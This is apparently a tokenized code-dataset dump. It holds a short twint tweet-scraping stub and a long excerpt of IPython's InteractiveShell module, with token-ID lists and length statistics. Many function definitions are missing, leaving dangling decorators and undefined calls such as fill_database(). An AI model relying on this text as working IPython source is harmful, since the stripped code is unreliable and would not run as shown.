content
stringlengths
1
1.04M
input_ids
sequencelengths
1
774k
ratio_char_token
float64
0.38
22.9
token_count
int64
1
774k
import database_model as db from database_model import Politician, Tweet, Hashtag import sqlalchemy import twint import arrow if __name__ == "__main__": fill_database()
[ 11748, 6831, 62, 19849, 355, 20613, 198, 6738, 6831, 62, 19849, 1330, 7793, 6749, 11, 18752, 11, 21059, 12985, 198, 11748, 44161, 282, 26599, 198, 198, 11748, 665, 600, 198, 11748, 15452, 628, 198, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 220, 220, 220, 6070, 62, 48806, 3419, 198 ]
3.277778
54
# -*- coding: utf-8 -*- """Main IPython class.""" #----------------------------------------------------------------------------- # Copyright (C) 2001 Janko Hauser <[email protected]> # Copyright (C) 2001-2007 Fernando Perez. <[email protected]> # Copyright (C) 2008-2011 The IPython Development Team # # Distributed under the terms of the BSD License. The full license is in # the file COPYING, distributed as part of this software. #----------------------------------------------------------------------------- import abc import ast import atexit import builtins as builtin_mod import functools import inspect import os import re import runpy import sys import tempfile import traceback import types import subprocess import warnings from io import open as io_open from pickleshare import PickleShareDB from traitlets.config.configurable import SingletonConfigurable from traitlets.utils.importstring import import_item from IPython.core import oinspect from IPython.core import magic from IPython.core import page from IPython.core import prefilter from IPython.core import ultratb from IPython.core.alias import Alias, AliasManager from IPython.core.autocall import ExitAutocall from IPython.core.builtin_trap import BuiltinTrap from IPython.core.events import EventManager, available_events from IPython.core.compilerop import CachingCompiler, check_linecache_ipython from IPython.core.debugger import Pdb from IPython.core.display_trap import DisplayTrap from IPython.core.displayhook import DisplayHook from IPython.core.displaypub import DisplayPublisher from IPython.core.error import InputRejected, UsageError from IPython.core.extensions import ExtensionManager from IPython.core.formatters import DisplayFormatter from IPython.core.history import HistoryManager from IPython.core.inputtransformer2 import ESC_MAGIC, ESC_MAGIC2 from IPython.core.logger import Logger from IPython.core.macro import Macro from IPython.core.payload import PayloadManager from IPython.core.prefilter import PrefilterManager from IPython.core.profiledir import ProfileDir from IPython.core.usage import default_banner from IPython.display import display from IPython.testing.skipdoctest import skip_doctest from IPython.utils import PyColorize from IPython.utils import io from IPython.utils import py3compat from IPython.utils import openpy from IPython.utils.decorators import undoc from IPython.utils.io import ask_yes_no from IPython.utils.ipstruct import Struct from IPython.paths import get_ipython_dir from IPython.utils.path import get_home_dir, get_py_filename, ensure_dir_exists from IPython.utils.process import system, getoutput from IPython.utils.strdispatch import StrDispatch from IPython.utils.syspathcontext import prepended_to_syspath from IPython.utils.text import format_screen, LSString, SList, DollarFormatter from IPython.utils.tempdir import TemporaryDirectory from traitlets import ( Integer, Bool, CaselessStrEnum, Enum, List, Dict, Unicode, Instance, Type, observe, default, validate, Any ) from warnings import warn from logging import error import IPython.core.hooks from typing import List as ListType, Tuple, Optional from ast import AST # NoOpContext is deprecated, but ipykernel imports it from here. # See https://github.com/ipython/ipykernel/issues/157 # (2016, let's try to remove than in IPython 8.0) from IPython.utils.contexts import NoOpContext try: import docrepr.sphinxify as sphx except ImportError: sphinxify = None class ProvisionalWarning(DeprecationWarning): """ Warning class for unstable features """ pass if sys.version_info > (3,8): from ast import Module else : # mock the new API, ignore second argument # see https://github.com/ipython/ipython/issues/11590 from ast import Module as OriginalModule Module = lambda nodelist, type_ignores: OriginalModule(nodelist) if sys.version_info > (3,6): _assign_nodes = (ast.AugAssign, ast.AnnAssign, ast.Assign) _single_targets_nodes = (ast.AugAssign, ast.AnnAssign) else: _assign_nodes = (ast.AugAssign, ast.Assign ) _single_targets_nodes = (ast.AugAssign, ) #----------------------------------------------------------------------------- # Await Helpers #----------------------------------------------------------------------------- def removed_co_newlocals(function:types.FunctionType) -> types.FunctionType: """Return a function that do not create a new local scope. Given a function, create a clone of this function where the co_newlocal flag has been removed, making this function code actually run in the sourounding scope. We need this in order to run asynchronous code in user level namespace. """ from types import CodeType, FunctionType CO_NEWLOCALS = 0x0002 code = function.__code__ new_co_flags = code.co_flags & ~CO_NEWLOCALS if sys.version_info > (3, 8, 0, 'alpha', 3): new_code = code.replace(co_flags=new_co_flags) else: new_code = CodeType( code.co_argcount, code.co_kwonlyargcount, code.co_nlocals, code.co_stacksize, new_co_flags, code.co_code, code.co_consts, code.co_names, code.co_varnames, code.co_filename, code.co_name, code.co_firstlineno, code.co_lnotab, code.co_freevars, code.co_cellvars ) return FunctionType(new_code, globals(), function.__name__, function.__defaults__) # we still need to run things using the asyncio eventloop, but there is no # async integration from .async_helpers import (_asyncio_runner, _asyncify, _pseudo_sync_runner) from .async_helpers import _curio_runner, _trio_runner, _should_be_async def _ast_asyncify(cell:str, wrapper_name:str) -> ast.Module: """ Parse a cell with top-level await and modify the AST to be able to run it later. Parameter --------- cell: str The code cell to asyncronify wrapper_name: str The name of the function to be used to wrap the passed `cell`. It is advised to **not** use a python identifier in order to not pollute the global namespace in which the function will be ran. Return ------ A module object AST containing **one** function named `wrapper_name`. The given code is wrapped in a async-def function, parsed into an AST, and the resulting function definition AST is modified to return the last expression. The last expression or await node is moved into a return statement at the end of the function, and removed from its original location. If the last node is not Expr or Await nothing is done. The function `__code__` will need to be later modified (by ``removed_co_newlocals``) in a subsequent step to not create new `locals()` meaning that the local and global scope are the same, ie as if the body of the function was at module level. Lastly a call to `locals()` is made just before the last expression of the function, or just after the last assignment or statement to make sure the global dict is updated as python function work with a local fast cache which is updated only on `local()` calls. """ from ast import Expr, Await, Return if sys.version_info >= (3,8): return ast.parse(cell) tree = ast.parse(_asyncify(cell)) function_def = tree.body[0] function_def.name = wrapper_name try_block = function_def.body[0] lastexpr = try_block.body[-1] if isinstance(lastexpr, (Expr, Await)): try_block.body[-1] = Return(lastexpr.value) ast.fix_missing_locations(tree) return tree #----------------------------------------------------------------------------- # Globals #----------------------------------------------------------------------------- # compiled regexps for autoindent management dedent_re = re.compile(r'^\s+raise|^\s+return|^\s+pass') #----------------------------------------------------------------------------- # Utilities #----------------------------------------------------------------------------- @undoc def softspace(file, newvalue): """Copied from code.py, to remove the dependency""" oldvalue = 0 try: oldvalue = file.softspace except AttributeError: pass try: file.softspace = newvalue except (AttributeError, TypeError): # "attribute-less object" or "read-only attributes" pass return oldvalue @undoc def get_default_colors(): "DEPRECATED" warn('get_default_color is deprecated since IPython 5.0, and returns `Neutral` on all platforms.', DeprecationWarning, stacklevel=2) return 'Neutral' class SeparateUnicode(Unicode): r"""A Unicode subclass to validate separate_in, separate_out, etc. This is a Unicode based trait that converts '0'->'' and ``'\\n'->'\n'``. """ @undoc class DummyMod(object): """A dummy module used for IPython's interactive module when a namespace must be assigned to the module's __dict__.""" __spec__ = None class ExecutionInfo(object): """The arguments used for a call to :meth:`InteractiveShell.run_cell` Stores information about what is going to happen. """ raw_cell = None store_history = False silent = False shell_futures = True class ExecutionResult(object): """The result of a call to :meth:`InteractiveShell.run_cell` Stores information about what took place. """ execution_count = None error_before_exec = None error_in_exec = None info = None result = None @property def raise_error(self): """Reraises error if `success` is `False`, otherwise does nothing""" if self.error_before_exec is not None: raise self.error_before_exec if self.error_in_exec is not None: raise self.error_in_exec class InteractiveShell(SingletonConfigurable): """An enhanced, interactive shell for Python.""" _instance = None ast_transformers = List([], help= """ A list of ast.NodeTransformer subclass instances, which will be applied to user input before code is run. """ ).tag(config=True) autocall = Enum((0,1,2), default_value=0, help= """ Make IPython automatically call any callable object even if you didn't type explicit parentheses. For example, 'str 43' becomes 'str(43)' automatically. The value can be '0' to disable the feature, '1' for 'smart' autocall, where it is not applied if there are no more arguments on the line, and '2' for 'full' autocall, where all callable objects are automatically called (even if no arguments are present). """ ).tag(config=True) autoindent = Bool(True, help= """ Autoindent IPython code entered interactively. """ ).tag(config=True) autoawait = Bool(True, help= """ Automatically run await statement in the top level repl. """ ).tag(config=True) loop_runner_map ={ 'asyncio':(_asyncio_runner, True), 'curio':(_curio_runner, True), 'trio':(_trio_runner, True), 'sync': (_pseudo_sync_runner, False) } loop_runner = Any(default_value="IPython.core.interactiveshell._asyncio_runner", allow_none=True, help="""Select the loop runner that will be used to execute top-level asynchronous code""" ).tag(config=True) @default('loop_runner') @validate('loop_runner') automagic = Bool(True, help= """ Enable magic commands to be called without the leading %. """ ).tag(config=True) banner1 = Unicode(default_banner, help="""The part of the banner to be printed before the profile""" ).tag(config=True) banner2 = Unicode('', help="""The part of the banner to be printed after the profile""" ).tag(config=True) cache_size = Integer(1000, help= """ Set the size of the output cache. The default is 1000, you can change it permanently in your config file. Setting it to 0 completely disables the caching system, and the minimum value accepted is 3 (if you provide a value less than 3, it is reset to 0 and a warning is issued). This limit is defined because otherwise you'll spend more time re-flushing a too small cache than working """ ).tag(config=True) color_info = Bool(True, help= """ Use colors for displaying information about objects. Because this information is passed through a pager (like 'less'), and some pagers get confused with color codes, this capability can be turned off. """ ).tag(config=True) colors = CaselessStrEnum(('Neutral', 'NoColor','LightBG','Linux'), default_value='Neutral', help="Set the color scheme (NoColor, Neutral, Linux, or LightBG)." ).tag(config=True) debug = Bool(False).tag(config=True) disable_failing_post_execute = Bool(False, help="Don't call post-execute functions that have failed in the past." ).tag(config=True) display_formatter = Instance(DisplayFormatter, allow_none=True) displayhook_class = Type(DisplayHook) display_pub_class = Type(DisplayPublisher) compiler_class = Type(CachingCompiler) sphinxify_docstring = Bool(False, help= """ Enables rich html representation of docstrings. (This requires the docrepr module). """).tag(config=True) @observe("sphinxify_docstring") enable_html_pager = Bool(False, help= """ (Provisional API) enables html representation in mime bundles sent to pagers. """).tag(config=True) @observe("enable_html_pager") data_pub_class = None exit_now = Bool(False) exiter = Instance(ExitAutocall) @default('exiter') # Monotonically increasing execution counter execution_count = Integer(1) filename = Unicode("<ipython console>") ipython_dir= Unicode('').tag(config=True) # Set to get_ipython_dir() in __init__ # Used to transform cells before running them, and check whether code is complete input_transformer_manager = Instance('IPython.core.inputtransformer2.TransformerManager', ()) @property input_transformers_post = List([], help="A list of string input transformers, to be applied after IPython's " "own input transformations." ) @property def input_splitter(self): """Make this available for backward compatibility (pre-7.0 release) with existing code. For example, ipykernel ipykernel currently uses `shell.input_splitter.check_complete` """ from warnings import warn warn("`input_splitter` is deprecated since IPython 7.0, prefer `input_transformer_manager`.", DeprecationWarning, stacklevel=2 ) return self.input_transformer_manager logstart = Bool(False, help= """ Start logging to the default log file in overwrite mode. Use `logappend` to specify a log file to **append** logs to. """ ).tag(config=True) logfile = Unicode('', help= """ The name of the logfile to use. """ ).tag(config=True) logappend = Unicode('', help= """ Start logging to the given file in append mode. Use `logfile` to specify a log file to **overwrite** logs to. """ ).tag(config=True) object_info_string_level = Enum((0,1,2), default_value=0, ).tag(config=True) pdb = Bool(False, help= """ Automatically call the pdb debugger after every exception. """ ).tag(config=True) display_page = Bool(False, help="""If True, anything that would be passed to the pager will be displayed as regular output instead.""" ).tag(config=True) # deprecated prompt traits: prompt_in1 = Unicode('In [\\#]: ', help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly." ).tag(config=True) prompt_in2 = Unicode(' .\\D.: ', help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly." ).tag(config=True) prompt_out = Unicode('Out[\\#]: ', help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly." ).tag(config=True) prompts_pad_left = Bool(True, help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly." ).tag(config=True) @observe('prompt_in1', 'prompt_in2', 'prompt_out', 'prompt_pad_left') show_rewritten_input = Bool(True, help="Show rewritten input, e.g. for autocall." ).tag(config=True) quiet = Bool(False).tag(config=True) history_length = Integer(10000, help='Total length of command history' ).tag(config=True) history_load_length = Integer(1000, help= """ The number of saved history entries to be loaded into the history buffer at startup. """ ).tag(config=True) ast_node_interactivity = Enum(['all', 'last', 'last_expr', 'none', 'last_expr_or_assign'], default_value='last_expr', help=""" 'all', 'last', 'last_expr' or 'none', 'last_expr_or_assign' specifying which nodes should be run interactively (displaying output from expressions). """ ).tag(config=True) # TODO: this part of prompt management should be moved to the frontends. # Use custom TraitTypes that convert '0'->'' and '\\n'->'\n' separate_in = SeparateUnicode('\n').tag(config=True) separate_out = SeparateUnicode('').tag(config=True) separate_out2 = SeparateUnicode('').tag(config=True) wildcards_case_sensitive = Bool(True).tag(config=True) xmode = CaselessStrEnum(('Context', 'Plain', 'Verbose', 'Minimal'), default_value='Context', help="Switch modes for the IPython exception handlers." ).tag(config=True) # Subcomponents of InteractiveShell alias_manager = Instance('IPython.core.alias.AliasManager', allow_none=True) prefilter_manager = Instance('IPython.core.prefilter.PrefilterManager', allow_none=True) builtin_trap = Instance('IPython.core.builtin_trap.BuiltinTrap', allow_none=True) display_trap = Instance('IPython.core.display_trap.DisplayTrap', allow_none=True) extension_manager = Instance('IPython.core.extensions.ExtensionManager', allow_none=True) payload_manager = Instance('IPython.core.payload.PayloadManager', allow_none=True) history_manager = Instance('IPython.core.history.HistoryAccessorBase', allow_none=True) magics_manager = Instance('IPython.core.magic.MagicsManager', allow_none=True) profile_dir = Instance('IPython.core.application.ProfileDir', allow_none=True) @property # Private interface _post_execute = Dict() # Tracks any GUI loop loaded for pylab pylab_gui_select = None last_execution_succeeded = Bool(True, help='Did last executed command succeeded') last_execution_result = Instance('IPython.core.interactiveshell.ExecutionResult', help='Result of executing the last command', allow_none=True) def get_ipython(self): """Return the currently running IPython instance.""" return self #------------------------------------------------------------------------- # Trait changed handlers #------------------------------------------------------------------------- @observe('ipython_dir') def set_autoindent(self,value=None): """Set the autoindent flag. If called with no arguments, it acts as a toggle.""" if value is None: self.autoindent = not self.autoindent else: self.autoindent = value #------------------------------------------------------------------------- # init_* methods called by __init__ #------------------------------------------------------------------------- def init_environment(self): """Any changes we need to make to the user's environment.""" pass @observe('colors') def init_logstart(self): """Initialize logging in case it was requested at the command line. """ if self.logappend: self.magic('logstart %s append' % self.logappend) elif self.logfile: self.magic('logstart %s' % self.logfile) elif self.logstart: self.magic('logstart') def init_deprecation_warnings(self): """ register default filter for deprecation warning. This will allow deprecation warning of function used interactively to show warning to users, and still hide deprecation warning from libraries import. """ if sys.version_info < (3,7): warnings.filterwarnings("default", category=DeprecationWarning, module=self.user_ns.get("__name__")) @observe('colors') def init_virtualenv(self): """Add a virtualenv to sys.path so the user can import modules from it. This isn't perfect: it doesn't use the Python interpreter with which the virtualenv was built, and it ignores the --no-site-packages option. A warning will appear suggesting the user installs IPython in the virtualenv, but for many cases, it probably works well enough. Adapted from code snippets online. http://blog.ufsoft.org/2009/1/29/ipython-and-virtualenv """ if 'VIRTUAL_ENV' not in os.environ: # Not in a virtualenv return p = os.path.normcase(sys.executable) p_venv = os.path.normcase(os.environ['VIRTUAL_ENV']) # executable path should end like /bin/python or \\scripts\\python.exe p_exe_up2 = os.path.dirname(os.path.dirname(p)) if p_exe_up2 and os.path.exists(p_venv) and os.path.samefile(p_exe_up2, p_venv): # Our exe is inside the virtualenv, don't need to do anything. return # fallback venv detection: # stdlib venv may symlink sys.executable, so we can't use realpath. # but others can symlink *to* the venv Python, so we can't just use sys.executable. # So we just check every item in the symlink tree (generally <= 3) paths = [p] while os.path.islink(p): p = os.path.normcase(os.path.join(os.path.dirname(p), os.readlink(p))) paths.append(p) # In Cygwin paths like "c:\..." and '\cygdrive\c\...' are possible if p_venv.startswith('\\cygdrive'): p_venv = p_venv[11:] elif len(p_venv) >= 2 and p_venv[1] == ':': p_venv = p_venv[2:] if any(p_venv in p for p in paths): # Running properly in the virtualenv, don't need to do anything return warn("Attempting to work in a virtualenv. If you encounter problems, please " "install IPython inside the virtualenv.") if sys.platform == "win32": virtual_env = os.path.join(os.environ['VIRTUAL_ENV'], 'Lib', 'site-packages') else: virtual_env = os.path.join(os.environ['VIRTUAL_ENV'], 'lib', 'python%d.%d' % sys.version_info[:2], 'site-packages') import site sys.path.insert(0, virtual_env) site.addsitedir(virtual_env) #------------------------------------------------------------------------- # Things related to injections into the sys module #------------------------------------------------------------------------- def save_sys_module_state(self): """Save the state of hooks in the sys module. This has to be called after self.user_module is created. """ self._orig_sys_module_state = {'stdin': sys.stdin, 'stdout': sys.stdout, 'stderr': sys.stderr, 'excepthook': sys.excepthook} self._orig_sys_modules_main_name = self.user_module.__name__ self._orig_sys_modules_main_mod = sys.modules.get(self.user_module.__name__) def restore_sys_module_state(self): """Restore the state of the sys module.""" try: for k, v in self._orig_sys_module_state.items(): setattr(sys, k, v) except AttributeError: pass # Reset what what done in self.init_sys_modules if self._orig_sys_modules_main_mod is not None: sys.modules[self._orig_sys_modules_main_name] = self._orig_sys_modules_main_mod #------------------------------------------------------------------------- # Things related to the banner #------------------------------------------------------------------------- @property #------------------------------------------------------------------------- # Things related to hooks #------------------------------------------------------------------------- def set_hook(self,name,hook, priority=50, str_key=None, re_key=None, _warn_deprecated=True): """set_hook(name,hook) -> sets an internal IPython hook. IPython exposes some of its internal API as user-modifiable hooks. By adding your function to one of these hooks, you can modify IPython's behavior to call at runtime your own routines.""" # At some point in the future, this should validate the hook before it # accepts it. Probably at least check that the hook takes the number # of args it's supposed to. f = types.MethodType(hook,self) # check if the hook is for strdispatcher first if str_key is not None: sdp = self.strdispatchers.get(name, StrDispatch()) sdp.add_s(str_key, f, priority ) self.strdispatchers[name] = sdp return if re_key is not None: sdp = self.strdispatchers.get(name, StrDispatch()) sdp.add_re(re.compile(re_key), f, priority ) self.strdispatchers[name] = sdp return dp = getattr(self.hooks, name, None) if name not in IPython.core.hooks.__all__: print("Warning! Hook '%s' is not one of %s" % \ (name, IPython.core.hooks.__all__ )) if _warn_deprecated and (name in IPython.core.hooks.deprecated): alternative = IPython.core.hooks.deprecated[name] warn("Hook {} is deprecated. Use {} instead.".format(name, alternative), stacklevel=2) if not dp: dp = IPython.core.hooks.CommandChainDispatcher() try: dp.add(f,priority) except AttributeError: # it was not commandchain, plain old func - replace dp = f setattr(self.hooks,name, dp) #------------------------------------------------------------------------- # Things related to events #------------------------------------------------------------------------- def register_post_execute(self, func): """DEPRECATED: Use ip.events.register('post_run_cell', func) Register a function for calling after code execution. """ warn("ip.register_post_execute is deprecated, use " "ip.events.register('post_run_cell', func) instead.", stacklevel=2) self.events.register('post_run_cell', func) #------------------------------------------------------------------------- # Things related to the "main" module #------------------------------------------------------------------------- def new_main_mod(self, filename, modname): """Return a new 'main' module object for user code execution. ``filename`` should be the path of the script which will be run in the module. Requests with the same filename will get the same module, with its namespace cleared. ``modname`` should be the module name - normally either '__main__' or the basename of the file without the extension. When scripts are executed via %run, we must keep a reference to their __main__ module around so that Python doesn't clear it, rendering references to module globals useless. This method keeps said reference in a private dict, keyed by the absolute path of the script. This way, for multiple executions of the same script we only keep one copy of the namespace (the last one), thus preventing memory leaks from old references while allowing the objects from the last execution to be accessible. """ filename = os.path.abspath(filename) try: main_mod = self._main_mod_cache[filename] except KeyError: main_mod = self._main_mod_cache[filename] = types.ModuleType( modname, doc="Module created for script run in IPython") else: main_mod.__dict__.clear() main_mod.__name__ = modname main_mod.__file__ = filename # It seems pydoc (and perhaps others) needs any module instance to # implement a __nonzero__ method main_mod.__nonzero__ = lambda : True return main_mod def clear_main_mod_cache(self): """Clear the cache of main modules. Mainly for use by utilities like %reset. Examples -------- In [15]: import IPython In [16]: m = _ip.new_main_mod(IPython.__file__, 'IPython') In [17]: len(_ip._main_mod_cache) > 0 Out[17]: True In [18]: _ip.clear_main_mod_cache() In [19]: len(_ip._main_mod_cache) == 0 Out[19]: True """ self._main_mod_cache.clear() #------------------------------------------------------------------------- # Things related to debugging #------------------------------------------------------------------------- call_pdb = property(_get_call_pdb,_set_call_pdb,None, 'Control auto-activation of pdb at exceptions') def debugger(self,force=False): """Call the pdb debugger. Keywords: - force(False): by default, this routine checks the instance call_pdb flag and does not actually invoke the debugger if the flag is false. The 'force' option forces the debugger to activate even if the flag is false. """ if not (force or self.call_pdb): return if not hasattr(sys,'last_traceback'): error('No traceback has been produced, nothing to debug.') return self.InteractiveTB.debugger(force=True) #------------------------------------------------------------------------- # Things related to IPython's various namespaces #------------------------------------------------------------------------- default_user_namespaces = True @property def prepare_user_module(self, user_module=None, user_ns=None): """Prepare the module and namespace in which user code will be run. When IPython is started normally, both parameters are None: a new module is created automatically, and its __dict__ used as the namespace. If only user_module is provided, its __dict__ is used as the namespace. If only user_ns is provided, a dummy module is created, and user_ns becomes the global namespace. If both are provided (as they may be when embedding), user_ns is the local namespace, and user_module provides the global namespace. Parameters ---------- user_module : module, optional The current user module in which IPython is being run. If None, a clean module will be created. user_ns : dict, optional A namespace in which to run interactive commands. Returns ------- A tuple of user_module and user_ns, each properly initialised. """ if user_module is None and user_ns is not None: user_ns.setdefault("__name__", "__main__") user_module = DummyMod() user_module.__dict__ = user_ns if user_module is None: user_module = types.ModuleType("__main__", doc="Automatically created module for IPython interactive environment") # We must ensure that __builtin__ (without the final 's') is always # available and pointing to the __builtin__ *module*. For more details: # http://mail.python.org/pipermail/python-dev/2001-April/014068.html user_module.__dict__.setdefault('__builtin__', builtin_mod) user_module.__dict__.setdefault('__builtins__', builtin_mod) if user_ns is None: user_ns = user_module.__dict__ return user_module, user_ns def init_user_ns(self): """Initialize all user-visible namespaces to their minimum defaults. Certain history lists are also initialized here, as they effectively act as user namespaces. Notes ----- All data structures here are only filled in, they are NOT reset by this method. If they were not empty before, data will simply be added to them. """ # This function works in two parts: first we put a few things in # user_ns, and we sync that contents into user_ns_hidden so that these # initial variables aren't shown by %who. After the sync, we add the # rest of what we *do* want the user to see with %who even on a new # session (probably nothing, so they really only see their own stuff) # The user dict must *always* have a __builtin__ reference to the # Python standard __builtin__ namespace, which must be imported. # This is so that certain operations in prompt evaluation can be # reliably executed with builtins. Note that we can NOT use # __builtins__ (note the 's'), because that can either be a dict or a # module, and can even mutate at runtime, depending on the context # (Python makes no guarantees on it). In contrast, __builtin__ is # always a module object, though it must be explicitly imported. # For more details: # http://mail.python.org/pipermail/python-dev/2001-April/014068.html ns = {} # make global variables for user access to the histories ns['_ih'] = self.history_manager.input_hist_parsed ns['_oh'] = self.history_manager.output_hist ns['_dh'] = self.history_manager.dir_hist # user aliases to input and output histories. These shouldn't show up # in %who, as they can have very large reprs. ns['In'] = self.history_manager.input_hist_parsed ns['Out'] = self.history_manager.output_hist # Store myself as the public api!!! ns['get_ipython'] = self.get_ipython ns['exit'] = self.exiter ns['quit'] = self.exiter # Sync what we've added so far to user_ns_hidden so these aren't seen # by %who self.user_ns_hidden.update(ns) # Anything put into ns now would show up in %who. Think twice before # putting anything here, as we really want %who to show the user their # stuff, not our variables. # Finally, update the real user's namespace self.user_ns.update(ns) @property def all_ns_refs(self): """Get a list of references to all the namespace dictionaries in which IPython might store a user-created object. Note that this does not include the displayhook, which also caches objects from the output.""" return [self.user_ns, self.user_global_ns, self.user_ns_hidden] + \ [m.__dict__ for m in self._main_mod_cache.values()] def reset(self, new_session=True, aggressive=False): """Clear all internal namespaces, and attempt to release references to user objects. If new_session is True, a new history session will be opened. """ # Clear histories self.history_manager.reset(new_session) # Reset counter used to index all histories if new_session: self.execution_count = 1 # Reset last execution result self.last_execution_succeeded = True self.last_execution_result = None # Flush cached output items if self.displayhook.do_full_cache: self.displayhook.flush() # The main execution namespaces must be cleared very carefully, # skipping the deletion of the builtin-related keys, because doing so # would cause errors in many object's __del__ methods. if self.user_ns is not self.user_global_ns: self.user_ns.clear() ns = self.user_global_ns drop_keys = set(ns.keys()) drop_keys.discard('__builtin__') drop_keys.discard('__builtins__') drop_keys.discard('__name__') for k in drop_keys: del ns[k] self.user_ns_hidden.clear() # Restore the user namespaces to minimal usability self.init_user_ns() if aggressive and not hasattr(self, "_sys_modules_keys"): print("Cannot restore sys.module, no snapshot") elif aggressive: print("culling sys module...") current_keys = set(sys.modules.keys()) for k in current_keys - self._sys_modules_keys: if k.startswith("multiprocessing"): continue del sys.modules[k] # Restore the default and user aliases self.alias_manager.clear_aliases() self.alias_manager.init_aliases() # Now define aliases that only make sense on the terminal, because they # need direct access to the console in a way that we can't emulate in # GUI or web frontend if os.name == 'posix': for cmd in ('clear', 'more', 'less', 'man'): if cmd not in self.magics_manager.magics['line']: self.alias_manager.soft_define_alias(cmd, cmd) # Flush the private list of module references kept for script # execution protection self.clear_main_mod_cache() def del_var(self, varname, by_name=False): """Delete a variable from the various namespaces, so that, as far as possible, we're not keeping any hidden references to it. Parameters ---------- varname : str The name of the variable to delete. by_name : bool If True, delete variables with the given name in each namespace. If False (default), find the variable in the user namespace, and delete references to it. """ if varname in ('__builtin__', '__builtins__'): raise ValueError("Refusing to delete %s" % varname) ns_refs = self.all_ns_refs if by_name: # Delete by name for ns in ns_refs: try: del ns[varname] except KeyError: pass else: # Delete by object try: obj = self.user_ns[varname] except KeyError: raise NameError("name '%s' is not defined" % varname) # Also check in output history ns_refs.append(self.history_manager.output_hist) for ns in ns_refs: to_delete = [n for n, o in ns.items() if o is obj] for name in to_delete: del ns[name] # Ensure it is removed from the last execution result if self.last_execution_result.result is obj: self.last_execution_result = None # displayhook keeps extra references, but not in a dictionary for name in ('_', '__', '___'): if getattr(self.displayhook, name) is obj: setattr(self.displayhook, name, None) def reset_selective(self, regex=None): """Clear selective variables from internal namespaces based on a specified regular expression. Parameters ---------- regex : string or compiled pattern, optional A regular expression pattern that will be used in searching variable names in the users namespaces. """ if regex is not None: try: m = re.compile(regex) except TypeError: raise TypeError('regex must be a string or compiled pattern') # Search for keys in each namespace that match the given regex # If a match is found, delete the key/value pair. for ns in self.all_ns_refs: for var in ns: if m.search(var): del ns[var] def push(self, variables, interactive=True): """Inject a group of variables into the IPython user namespace. Parameters ---------- variables : dict, str or list/tuple of str The variables to inject into the user's namespace. If a dict, a simple update is done. If a str, the string is assumed to have variable names separated by spaces. A list/tuple of str can also be used to give the variable names. If just the variable names are give (list/tuple/str) then the variable values looked up in the callers frame. interactive : bool If True (default), the variables will be listed with the ``who`` magic. """ vdict = None # We need a dict of name/value pairs to do namespace updates. if isinstance(variables, dict): vdict = variables elif isinstance(variables, (str, list, tuple)): if isinstance(variables, str): vlist = variables.split() else: vlist = variables vdict = {} cf = sys._getframe(1) for name in vlist: try: vdict[name] = eval(name, cf.f_globals, cf.f_locals) except: print('Could not get variable %s from %s' % (name,cf.f_code.co_name)) else: raise ValueError('variables must be a dict/str/list/tuple') # Propagate variables to user namespace self.user_ns.update(vdict) # And configure interactive visibility user_ns_hidden = self.user_ns_hidden if interactive: for name in vdict: user_ns_hidden.pop(name, None) else: user_ns_hidden.update(vdict) def drop_by_id(self, variables): """Remove a dict of variables from the user namespace, if they are the same as the values in the dictionary. This is intended for use by extensions: variables that they've added can be taken back out if they are unloaded, without removing any that the user has overwritten. Parameters ---------- variables : dict A dictionary mapping object names (as strings) to the objects. """ for name, obj in variables.items(): if name in self.user_ns and self.user_ns[name] is obj: del self.user_ns[name] self.user_ns_hidden.pop(name, None) #------------------------------------------------------------------------- # Things related to object introspection #------------------------------------------------------------------------- def _ofind(self, oname, namespaces=None): """Find an object in the available namespaces. self._ofind(oname) -> dict with keys: found,obj,ospace,ismagic Has special code to detect magic functions. """ oname = oname.strip() if not oname.startswith(ESC_MAGIC) and \ not oname.startswith(ESC_MAGIC2) and \ not all(a.isidentifier() for a in oname.split(".")): return {'found': False} if namespaces is None: # Namespaces to search in: # Put them in a list. The order is important so that we # find things in the same order that Python finds them. namespaces = [ ('Interactive', self.user_ns), ('Interactive (global)', self.user_global_ns), ('Python builtin', builtin_mod.__dict__), ] ismagic = False isalias = False found = False ospace = None parent = None obj = None # Look for the given name by splitting it in parts. If the head is # found, then we look for all the remaining parts as members, and only # declare success if we can find them all. oname_parts = oname.split('.') oname_head, oname_rest = oname_parts[0],oname_parts[1:] for nsname,ns in namespaces: try: obj = ns[oname_head] except KeyError: continue else: for idx, part in enumerate(oname_rest): try: parent = obj # The last part is looked up in a special way to avoid # descriptor invocation as it may raise or have side # effects. if idx == len(oname_rest) - 1: obj = self._getattr_property(obj, part) else: obj = getattr(obj, part) except: # Blanket except b/c some badly implemented objects # allow __getattr__ to raise exceptions other than # AttributeError, which then crashes IPython. break else: # If we finish the for loop (no break), we got all members found = True ospace = nsname break # namespace loop # Try to see if it's magic if not found: obj = None if oname.startswith(ESC_MAGIC2): oname = oname.lstrip(ESC_MAGIC2) obj = self.find_cell_magic(oname) elif oname.startswith(ESC_MAGIC): oname = oname.lstrip(ESC_MAGIC) obj = self.find_line_magic(oname) else: # search without prefix, so run? will find %run? obj = self.find_line_magic(oname) if obj is None: obj = self.find_cell_magic(oname) if obj is not None: found = True ospace = 'IPython internal' ismagic = True isalias = isinstance(obj, Alias) # Last try: special-case some literals like '', [], {}, etc: if not found and oname_head in ["''",'""','[]','{}','()']: obj = eval(oname_head) found = True ospace = 'Interactive' return { 'obj':obj, 'found':found, 'parent':parent, 'ismagic':ismagic, 'isalias':isalias, 'namespace':ospace } @staticmethod def _getattr_property(obj, attrname): """Property-aware getattr to use in object finding. If attrname represents a property, return it unevaluated (in case it has side effects or raises an error. """ if not isinstance(obj, type): try: # `getattr(type(obj), attrname)` is not guaranteed to return # `obj`, but does so for property: # # property.__get__(self, None, cls) -> self # # The universal alternative is to traverse the mro manually # searching for attrname in class dicts. attr = getattr(type(obj), attrname) except AttributeError: pass else: # This relies on the fact that data descriptors (with both # __get__ & __set__ magic methods) take precedence over # instance-level attributes: # # class A(object): # @property # def foobar(self): return 123 # a = A() # a.__dict__['foobar'] = 345 # a.foobar # == 123 # # So, a property may be returned right away. if isinstance(attr, property): return attr # Nothing helped, fall back. return getattr(obj, attrname) def _object_find(self, oname, namespaces=None): """Find an object and return a struct with info about it.""" return Struct(self._ofind(oname, namespaces)) def _inspect(self, meth, oname, namespaces=None, 